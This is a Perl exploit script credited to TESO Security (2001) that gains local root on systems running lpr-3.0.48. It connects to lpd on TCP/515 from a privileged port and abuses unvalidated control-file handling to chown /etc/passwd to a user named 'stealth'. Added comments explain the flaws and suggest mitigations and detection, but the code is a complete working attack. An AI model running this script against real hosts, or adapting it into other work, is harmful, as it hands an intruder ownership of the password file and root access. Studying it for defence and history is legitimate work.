#!/usr/bin/perl -w
# 7350lapsus
#
# lpr-3.0.48 Local root exploit.
# requires root on a host counted in
# hosts.lpd and local account on lpd box.
# This is proof of concept, chown()ing /etc/passwd
# to a user named 'stealth'.
#
# (C) COPYRIGHT TESO Security, 2001
# All Rights Reserved
#
# May be used under the terms of the GPL.
#
use IO::Socket;
# Read the single acknowledgement byte lpd returns after each command and
# stop the whole script unless it is the NUL byte meaning "accepted".
# Takes the connected socket as its only argument; returns nothing.
sub recvack
{
my $sock = shift;
my $reply;
$sock->recv($reply, 1);
return if $reply eq "\0";
print "Some ACK-error occured.\n";
exit;
}
# Historical proof-of-concept (see header) against the lpr-3.0.48 lpd.
# Defensive reading of what follows: the client must already hold root
# locally (to bind a privileged source port) and must come from a host
# the server lists in hosts.lpd, so the exposure is the trust lpd placed
# in hosts.lpd peers and in client-supplied control-file contents.
# Mitigations: a patched lpd, a minimal hosts.lpd, and filtering TCP/515
# so only known print clients reach it. Detection: unexpected connections
# to TCP/515, especially from source ports 721-731 and from hosts that
# are not print clients.
$rem = shift;
if (!defined($rem)) {
print "$0 <hostname>\n"; exit;
}
# Open connection
# lpd only accepts clients bound to a low source port (the 721-731 range
# used here), which is why root is needed on the client side. The loop
# keeps trying the next port until a connection succeeds or the range is
# exhausted; $peer stays undef if every attempt fails.
for ($i = 721; $i <= 731 && !defined $peer; ++$i) {
$peer = IO::Socket::INET->new(PeerAddr => $rem,
PeerPort => 515,
LocalPort => $i,
Proto => "tcp",
Type => SOCK_STREAM);
}
die "$!" if (!defined($peer));
# NOTE: the loop's ++$i runs once more after the successful connect, so
# this prints one higher than the port actually bound (cosmetic only).
print "Bound to port $i\n";
# \2 = "receive a printer job" for queue "lp"; each step below expects a
# NUL acknowledgement, checked by recvack().
print $peer "\2lp\n";
recvack($peer);
# Control file: 'P' (user) line followed by an 'a' line naming a path.
$payload = "Pstealth\na/etc/passwd\n";
$l = length($payload);
# First bug in lpd: allows to create files in /
# with length up to 5 chars
# \x02 here is the "receive control file" subcommand: byte count, then
# the file name the server is asked to create. The absence of name
# validation on the server side is the first weakness the header names.
print $peer "\x02$l /foo\n";
recvack($peer);
# This one is incredible. it trusts controlfiles
# input to chown ANY file on system to user.
# The server acting on an unvalidated path from the control file is the
# second weakness; the trailing NUL terminates the transfer.
print $peer $payload;
print $peer "\0";
recvack($peer);
close $peer;